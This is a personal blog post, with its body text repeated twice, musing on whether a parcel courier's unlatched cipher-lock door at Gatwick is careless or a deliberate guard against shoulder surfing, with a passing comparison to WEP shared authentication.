Self Defeating Security
Part of my role involves inspecting 3rd party vendor’s sites to ensure that they comply with my client’s security policies. This is normally when a vendor will be storing or processing my client’s data
One of the unfortunate side effects of this, is that I find myself evaluating security when not at work as well.
For example, yesterday I was at Citilink parcel couriers warehouse at Gatwick collecting a delivery. They had cipher locks on the doors leading into the restricted areas of the building. There was no obvious CCTV focused on these doors, so the locks seemed to be more for casual security.
Also there were no privacy shields on the locks, so shoulder surfing was definitely an option. On the positive side, the numbers were not on the buttons themselves so wear on frequently used combinations would be harder to detect.
OK so far. Then I noticed that the door had been left on the latch so anyone could walk in, [see picture].
Here is where it gets interesting. Is this bad security or good security?
The answer depends on what threat they are attempting to mitigate against. As a shoulder surfing attack was on the cards, maybe CitiLink had realized this and so have a policy of latching the door to prevent possible disclosure of the entry code.
Slightly unusual, but there is the compensating control of having many staff around during the day to detect intruders.
Then during night hours they engage the door lock, with reasonable assurance that the entry code hasn't been compromised. They may not even tell the day staff the number to provide additional protection.
This would be similar to not using shared authentication with WEP as it reveals plain and cipher text with the data encrypting WEP key, actually reducing overall security. http://www.securityfocus.com/infocus/1814
....Or maybe someone at Citilink just forgot and left the door on the latch ;)
One of the unfortunate side effects of this, is that I find myself evaluating security when not at work as well.
For example, yesterday I was at Citilink parcel couriers warehouse at Gatwick collecting a delivery. They had cipher locks on the doors leading into the restricted areas of the building. There was no obvious CCTV focused on these doors, so the locks seemed to be more for casual security.
Also there were no privacy shields on the locks, so shoulder surfing was definitely an option. On the positive side, the numbers were not on the buttons themselves so wear on frequently used combinations would be harder to detect.
OK so far. Then I noticed that the door had been left on the latch so anyone could walk in, [see picture].
Here is where it gets interesting. Is this bad security or good security?
The answer depends on what threat they are attempting to mitigate against. As a shoulder surfing attack was on the cards, maybe CitiLink had realized this and so have a policy of latching the door to prevent possible disclosure of the entry code.
Slightly unusual, but there is the compensating control of having many staff around during the day to detect intruders.
Then during night hours they engage the door lock, with reasonable assurance that the entry code hasn't been compromised. They may not even tell the day staff the number to provide additional protection.
This would be similar to not using shared authentication with WEP as it reveals plain and cipher text with the data encrypting WEP key, actually reducing overall security. http://www.securityfocus.com/infocus/1814
....Or maybe someone at Citilink just forgot and left the door on the latch ;)
posted by Paul Vincent at 9:45 AM
-730534.jpg)
0 Comments:
Post a Comment
Links to this post:
Create a Link
<< Home